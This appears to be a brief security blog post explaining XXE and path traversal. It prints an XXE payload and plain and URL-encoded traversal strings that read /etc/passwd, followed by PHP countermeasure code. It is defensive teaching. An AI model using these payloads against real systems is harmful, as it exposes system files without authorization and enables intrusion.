← Back to home
XXE Path Traversal LFI OWASP XML

XXE & Path Traversal

May 5, 2022

Exploitation of XXE and Path Traversal vulnerabilities with countermeasures.

<!-- XXE: read /etc/passwd -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

# Path Traversal:
?file=../../../etc/passwd
?file=..%2F..%2F..%2Fetc%2Fpasswd   # URL encoded
// Defense PHP:
libxml_disable_entity_loader(true);
$real = realpath($base . $file);
if (strpos($real, $base) !== 0) die('Forbidden');